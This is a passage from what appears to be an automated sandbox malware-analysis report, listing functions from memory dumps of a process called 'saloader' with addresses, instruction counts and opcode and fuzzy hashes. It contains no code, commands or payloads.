                                                                                          • Instruction Fuzzy Hash: 6C21C55A91C2999FEB42B77CE8615F97FB0EF46364B0481B3D188CE1B3DC18948A8391
                                                                                          Function 00007FFAAC7DFE45 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: x69O
                                                                                          • API String ID: 0-1204690934
                                                                                          • Opcode ID: 01da3eadac3ef9062404a70be7dfe99ca893e06a527ddf7b780f8f823b37c8d5
                                                                                          • Instruction ID: 5a4f31422644f093913ffae2ef2021f18e165cbfb0a7f2c75d95966212b0a854
                                                                                          • Opcode Fuzzy Hash: 01da3eadac3ef9062404a70be7dfe99ca893e06a527ddf7b780f8f823b37c8d5
                                                                                          • Instruction Fuzzy Hash: A501C021A09A4A4FEB86EB7C98956B4B7E1EF9A31070540F6D00CCB297D928DC458381
                                                                                          Function 00007FFAAC7DB937 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: X^9O
                                                                                          • API String ID: 0-2704812624
                                                                                          • Opcode ID: d4aa6cb44cfd8fe31f437d49080f96bd6e95c00fa08e43ad8967ebba0f438c1d
                                                                                          • Instruction ID: b216c06a33fbcf3cb8f8ed1e01cdf41db85610a996fc8c8537ca4f41cd275a18
                                                                                          • Opcode Fuzzy Hash: d4aa6cb44cfd8fe31f437d49080f96bd6e95c00fa08e43ad8967ebba0f438c1d
                                                                                          • Instruction Fuzzy Hash: 8411D32680E586CFF7579B2488216A57BF0EF93310F5845FEC44DCB292D928984E8A91
                                                                                          Function 00007FFAAC6166EC Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: H79O
                                                                                          • API String ID: 0-3056045408
                                                                                          • Opcode ID: 77c7d0b053a6bc42543086c3cca80ccb52e9672edceb10162bb9064b6823bf2a
                                                                                          • Instruction ID: 892808c70090e5f402212fc71629a176ec9554da5c0f5ef6f0bdace8f4928008
                                                                                          • Opcode Fuzzy Hash: 77c7d0b053a6bc42543086c3cca80ccb52e9672edceb10162bb9064b6823bf2a
                                                                                          • Instruction Fuzzy Hash: 6B018862A4894D4FEB85FB78C419BA9B6E6FF8A301F0504F6E40EC72A2DD289C454781
                                                                                          Function 00007FFAAC7E2959 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: >
                                                                                          • API String ID: 0-3434628772
                                                                                          • Opcode ID: 3736ae88662765ee07de8bef6dd82bc7231f118dbf8bf4899cc7de6883341ebf
                                                                                          • Instruction ID: bdbf8e83e03ecf99144702a2b2f3b2976136894f30cb8a453a3fc9dce8875ef1
                                                                                          • Opcode Fuzzy Hash: 3736ae88662765ee07de8bef6dd82bc7231f118dbf8bf4899cc7de6883341ebf
                                                                                          • Instruction Fuzzy Hash: 45F0B46260EAD59FE766E33C88586617FE1EF4B310B1944EAD0CCCB5A3C5558C08C392
                                                                                          Function 00007FFAAC629ED8 Relevance: 1.2, Instructions: 1165COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 01f436f33d9ec0cbda2d89bbfd7e39eb9e36843ba326fc2f6336874b073bfaf6
                                                                                          • Instruction ID: b19329e99f6464ac5d17696e7d1131aca5cbdd5d15c35f6c2b51a66ba3df70e7
                                                                                          • Opcode Fuzzy Hash: 01f436f33d9ec0cbda2d89bbfd7e39eb9e36843ba326fc2f6336874b073bfaf6
                                                                                          • Instruction Fuzzy Hash: 2B72C23060890A8FEBD6EF2CD458AA577E1FF9A34071550FAD44DCB2A3EE25EC458790
                                                                                          Function 00007FFAAC6275F2 Relevance: 1.1, Instructions: 1064COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a3675825401346364968fb115cd2e1390dde1d82d4fe5e95ca36d9561f32a30f
                                                                                          • Instruction ID: ffeaa72d87a0d5ea09d1fdc6e246d11ca023a948a46107577c17f5a457e3be4c
                                                                                          • Opcode Fuzzy Hash: a3675825401346364968fb115cd2e1390dde1d82d4fe5e95ca36d9561f32a30f
                                                                                          • Instruction Fuzzy Hash: D2621671A1EA4E8FFB9ADB2C94556743BD1EF86310B1491BED04FC7192DE25EC0A8381
                                                                                          Function 00007FFAAC7D9C3E Relevance: .8, Instructions: 820COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c789b830a9bd7936dc6e1457e7e2e7a38b4f2cfa24841ec5fb7711bc89004f8d
                                                                                          • Instruction ID: 89e3c8032ce22bf00e2e7b0b820829d334176d318da16c8f988273421271f936
                                                                                          • Opcode Fuzzy Hash: c789b830a9bd7936dc6e1457e7e2e7a38b4f2cfa24841ec5fb7711bc89004f8d
                                                                                          • Instruction Fuzzy Hash: 7A529431918B4A8FDB56DF78C851A94BBF1FF56300F4401EAE449CB292EE38AC85CB51
                                                                                          Function 00007FFAAC630DDC Relevance: .8, Instructions: 801COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e28b0cb4dace17f070ecaacb931b2da4ac5319612392aaad1f129f89863bad02
                                                                                          • Instruction ID: d8b2c7c2b6c4ca37319b3c3c063254289a590ede817821804cb198f53698ae54
                                                                                          • Opcode Fuzzy Hash: e28b0cb4dace17f070ecaacb931b2da4ac5319612392aaad1f129f89863bad02
                                                                                          • Instruction Fuzzy Hash: A942D174E18A4ACFEB85EB98C841BA9B7F1FF49340F1141B5D40DD7286DE38AC868B51
                                                                                          Function 00007FFAAC630E09 Relevance: .8, Instructions: 800COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 60d6e3f84b1cd80c7df8be4092a864e1b5cbbac0c42e2447abacd3ce72d1c21b
                                                                                          • Instruction ID: 7c4f4866529570b0b11cf91364dce6703d99556b56f95e8b3dc3773b81c988c0
                                                                                          • Opcode Fuzzy Hash: 60d6e3f84b1cd80c7df8be4092a864e1b5cbbac0c42e2447abacd3ce72d1c21b
                                                                                          • Instruction Fuzzy Hash: 4542D074E18A4ACFEB85DB98C841BA9B7F1FF4A350F1141B5D40DD3286DE38AC868B51
                                                                                          Function 00007FFAAC640FB0 Relevance: .7, Instructions: 683COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3078aa7d9d55df3d299f3a97aeb80f755867401ccae56adf5c86469a7ce98d4a
                                                                                          • Instruction ID: 1e4ede08af856ed827e02bc0994f5fb979516dc7e1715fd64f6dfcf9f522508f
                                                                                          • Opcode Fuzzy Hash: 3078aa7d9d55df3d299f3a97aeb80f755867401ccae56adf5c86469a7ce98d4a
                                                                                          • Instruction Fuzzy Hash: C6127C3071990D8FEBA5EB2CD458A7477E2EFA9300B1551FAE40ECB2A6DE24DC458781
                                                                                          Function 00007FFAAC6255DD Relevance: .6, Instructions: 567COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d29f31a20123320b16a49fb97e6409be355f8943cfecd8c18e7a7e9874043a4a
                                                                                          • Instruction ID: 56198ecd95de337462b639ad542807137aa6791f7ea433a9d5c473584585ae49
                                                                                          • Opcode Fuzzy Hash: d29f31a20123320b16a49fb97e6409be355f8943cfecd8c18e7a7e9874043a4a
                                                                                          • Instruction Fuzzy Hash: 1BF10321A1EE4A8FFAEAC71C8690635B6D1FF5A200B4861BAD41EC35C7ED14EC4983C5
                                                                                          Function 00007FFAAC7E93A9 Relevance: .6, Instructions: 563COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd6e059a3167befc525870a2cdb78a29a23b2a355d98906734db638861c5846d
                                                                                          • Instruction ID: fa0f7326a74d39edcc136f9e8484043b45793e5a74c4b1709fccb62baa4c5790
                                                                                          • Opcode Fuzzy Hash: fd6e059a3167befc525870a2cdb78a29a23b2a355d98906734db638861c5846d
                                                                                          • Instruction Fuzzy Hash: 54F1E773A1DA4A8FF799DB2C94546B57BE1FF9A314B0480BAD04DC7296DE24EC0983C1
                                                                                          Function 00007FFAAC629EB0 Relevance: .5, Instructions: 538COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 860a9ff716cd0cd98a3b629e30e1bc216047c9e835493f82eb6679f1b6656bdd
                                                                                          • Instruction ID: 6ed771960a56aa24395cf7414f1d842d4419cda6da42dca6e591ac264f7e9c63
                                                                                          • Opcode Fuzzy Hash: 860a9ff716cd0cd98a3b629e30e1bc216047c9e835493f82eb6679f1b6656bdd
                                                                                          • Instruction Fuzzy Hash: 3DF1D571A18A4E8FFB99DB6CC895AB877E1FF59300B2451BDD04DC7296DE24EC068780
                                                                                          Function 00007FFAAC63D750 Relevance: .5, Instructions: 511COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 41e549430cd8153d772868a1b47e55e0342b1aac152473f317ef91ba14eac5b1
                                                                                          • Instruction ID: c784704ef49cb7d79b294a9ebb3e8402cf0378dbcfb075e7388298cbd1fc17bc
                                                                                          • Opcode Fuzzy Hash: 41e549430cd8153d772868a1b47e55e0342b1aac152473f317ef91ba14eac5b1
                                                                                          • Instruction Fuzzy Hash: 95F1233091DA4A8FE76ADB28C4855B5B7E0FF96300F24957DD08EC3692DE25E84A87C1
                                                                                          Function 00007FFAAC7D6294 Relevance: .5, Instructions: 486COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 68f977de2b6bcdcd2ab202a5ae5f94e8ed0767fea6d5b82421ca0d04d6062851
                                                                                          • Instruction ID: 46cef9352e4648c74f2125f5170e6d02058d78ad00e5becd328c86fe99c0baeb
                                                                                          • Opcode Fuzzy Hash: 68f977de2b6bcdcd2ab202a5ae5f94e8ed0767fea6d5b82421ca0d04d6062851
                                                                                          • Instruction Fuzzy Hash: 60E10A34919A4A8FFB96EB28C855AB577F1FF56300F0485BAD41DC7192DE38E8068B81
                                                                                          Function 00007FFAAC7D6DB4 Relevance: .4, Instructions: 402COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 31d43a34a535eb4a405d600f6c45b4c383d36923ecdf0898e6e77fbf64c82373
                                                                                          • Instruction ID: 00c4bdfd6f3dac001a8eceb46d3f7d28f06dbea0092c7b38395b3524d5832aa2
                                                                                          • Opcode Fuzzy Hash: 31d43a34a535eb4a405d600f6c45b4c383d36923ecdf0898e6e77fbf64c82373
                                                                                          • Instruction Fuzzy Hash: 37C11256A1EAC78FE796973898656B57FF0FF46200B0881FBD04DC7197DD18E80A8781
                                                                                          Function 00007FFAAC629FA8 Relevance: .4, Instructions: 379COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d52f4ffda9a15307d651f05bb2bd94b12534b58613f2021e557d574b769bd183
                                                                                          • Instruction ID: ba2ce6858d4b039dc4bdc02e170153bf010683788edbc83992d99a43a0e8da4b
                                                                                          • Opcode Fuzzy Hash: d52f4ffda9a15307d651f05bb2bd94b12534b58613f2021e557d574b769bd183
                                                                                          • Instruction Fuzzy Hash: 6DA1F171A0DA498FF76ADB2C984A6B07BC0EF96710B1562BEE04DC31A7DD15EC4683C0
                                                                                          Function 00007FFAAC7DE6F8 Relevance: .4, Instructions: 361COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 272c6e3c5a3d8682aef9a2d05091f3c6addb35ffd7936efee8cf69ba88f6e778
                                                                                          • Instruction ID: d048cd7b15d5f7d4fe5e93910e08a9f9682bc9cd67a4f885bceef4f1e8dc8040
                                                                                          • Opcode Fuzzy Hash: 272c6e3c5a3d8682aef9a2d05091f3c6addb35ffd7936efee8cf69ba88f6e778
                                                                                          • Instruction Fuzzy Hash: D3C1FA72A0EB498FE796973884553B57BE1FF56310F4445BED08EC76A2DF28A809C381
                                                                                          Function 00007FFAAC655DC0 Relevance: .4, Instructions: 354COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6f25b07346ae6b0e4ea8669d59b241c709168078abe57d71f0d645bfc0440ae1
                                                                                          • Instruction ID: a635ba6fa2364730d582ebeae38c0d41c82fe5703c3c844258fead3b6a10287d
                                                                                          • Opcode Fuzzy Hash: 6f25b07346ae6b0e4ea8669d59b241c709168078abe57d71f0d645bfc0440ae1
                                                                                          • Instruction Fuzzy Hash: 42B1B371A19A0E8FEBA9EB18C045A7673D1FF99300F20A57DD45FC3196DE28F8468781
                                                                                          Function 00007FFAAC660DA8 Relevance: .4, Instructions: 351COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5cfc7757a5f029a98898ddae929de62d362ec157e902bb6dd992b13e06bd317b
                                                                                          • Instruction ID: acbf1ee7aeb71a59b9b57d6acb865f3515f38049837ffd1afb9b6b84394252b5
                                                                                          • Opcode Fuzzy Hash: 5cfc7757a5f029a98898ddae929de62d362ec157e902bb6dd992b13e06bd317b
                                                                                          • Instruction Fuzzy Hash: A3C17030A19A4ACFFBA9DB28C480776F7D1FF55308F54A4B9C44EC6585CA79E889C780
                                                                                          Function 00007FFAAC62556D Relevance: .3, Instructions: 336COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 280ed008668dcfac602b063c69cfba9bed0ae58d5f26b171c6257d2e719cfed4
                                                                                          • Instruction ID: 6660782f9043930ee10c2bd263826e331694356dcbd81f20378792a3ea265e01
                                                                                          • Opcode Fuzzy Hash: 280ed008668dcfac602b063c69cfba9bed0ae58d5f26b171c6257d2e719cfed4
                                                                                          • Instruction Fuzzy Hash: DC913672E1DE0D8FFB59DB1C98592B937D1EF99321B18527EE44DC3292ED20E80642C1
                                                                                          Function 00007FFAAC7D8409 Relevance: .3, Instructions: 333COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ee4962e8062609707451091b608b2ed17bc4f06b42c73b0a77d9d5330d775afb
                                                                                          • Instruction ID: 84441da0c878131cd0cd3df0ffc939115086d678127db946bfc3ef478fc48134
                                                                                          • Opcode Fuzzy Hash: ee4962e8062609707451091b608b2ed17bc4f06b42c73b0a77d9d5330d775afb
                                                                                          • Instruction Fuzzy Hash: 46A1F472A0DA498FFB9A9B1888157B977E1FF96310F0441BAD04ED7292DE21ED458BC0
                                                                                          Function 00007FFAAC629F3D Relevance: .3, Instructions: 333COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 26f65739d25d4b4509058898d50d3e1c7893ae2512037586f48f69fb97987b70
                                                                                          • Instruction ID: 46cc7d04f77ba0f1b95bb5a0b807eefe085ea3e1e053b739bb8b14016e904450
                                                                                          • Opcode Fuzzy Hash: 26f65739d25d4b4509058898d50d3e1c7893ae2512037586f48f69fb97987b70
                                                                                          • Instruction Fuzzy Hash: 80B14C30619909CFEB95EF2CC598BA577E1FF5A300F0451B9E44ECB2A6DA24EC44CB91
                                                                                          Function 00007FFAAC7E1A7A Relevance: .3, Instructions: 321COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ce4d2c46bc3b165e4ed3b6586531f957ff4a77d25c0c7e3440e1716f74cd384c
                                                                                          • Instruction ID: cc3a16a729bf17c972bd30aec9d3697dae518379f16abeef7dfc7ba5e3243e4a
                                                                                          • Opcode Fuzzy Hash: ce4d2c46bc3b165e4ed3b6586531f957ff4a77d25c0c7e3440e1716f74cd384c
                                                                                          • Instruction Fuzzy Hash: 57913B12A0DE4A4FF7A5A73C94566743BE1EF9A210B4940FAD04DC71A3DE1CDC4A83C1
                                                                                          Function 00007FFAAC7D7E68 Relevance: .3, Instructions: 315COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d080e5b342f2d8dea0e69011867caffcbd2756e359b86f5c696818015619819d
                                                                                          • Instruction ID: fde10901ea0d1b99ee9bdd3b4a23f1353690728ee5b3f89c9600813ea9a16eb2
                                                                                          • Opcode Fuzzy Hash: d080e5b342f2d8dea0e69011867caffcbd2756e359b86f5c696818015619819d
                                                                                          • Instruction Fuzzy Hash: C6910A71A0DA4A8FFB56DB2884517A97BE1EF85300F0841B6D54DC718BDE24DC49CBC1
                                                                                          Function 00007FFAAC61BE66 Relevance: .3, Instructions: 308COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0b3b27cd891770b93b7a8b1825206e037596476015965f59b297b1c4ed7339e6
                                                                                          • Instruction ID: 4a37dd1220605be54940f161f81edcf39869f89cbf2d496fc90d4a3790d05bfc
                                                                                          • Opcode Fuzzy Hash: 0b3b27cd891770b93b7a8b1825206e037596476015965f59b297b1c4ed7339e6
                                                                                          • Instruction Fuzzy Hash: D0C1BE74504A4E8FEBC5EF18C49CBA937E1FB68305F24457E982DCB295DB369896CB00
                                                                                          Function 00007FFAAC7E9F6E Relevance: .3, Instructions: 303COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 24bab480799c8d11576d57983aae4a675659e954c1d27e32960221b0dcce629c
                                                                                          • Instruction ID: adbce51ff44d2f6d7891e45e157454d5a98cd055bad226ba5dd265506a221314
                                                                                          • Opcode Fuzzy Hash: 24bab480799c8d11576d57983aae4a675659e954c1d27e32960221b0dcce629c
                                                                                          • Instruction Fuzzy Hash: A4918671A19A498FEFD5EB2CC464A683FF1FF59314B0540AAE04DD72A2DB24DC45C781
                                                                                          Function 00007FFAAC7E2A1C Relevance: .3, Instructions: 301COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6284a1911231d36aa8aaa58fe17818da20deab786acefa4784ce3cb78c70b700
                                                                                          • Instruction ID: 9a2145fbcd58977a5c8d8992cfe1c67feaae4aee55ea82c58673dbe6eea83524
                                                                                          • Opcode Fuzzy Hash: 6284a1911231d36aa8aaa58fe17818da20deab786acefa4784ce3cb78c70b700
                                                                                          • Instruction Fuzzy Hash: 52A19071A08B4ACFE7A8DF28C44466577F1FF59300F50466AD04DC76A1DB35E846CB81
                                                                                          Function 00007FFAAC7E68C0 Relevance: .3, Instructions: 293COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ca7d0fa9ba3952bc92cd57e2beef8f690745ec57440a1a601d6c5059afb8b12c
                                                                                          • Instruction ID: 3543ef41145e411e00e150fbac251ab1f9253c9e575f0d7f33872d0c68a06421
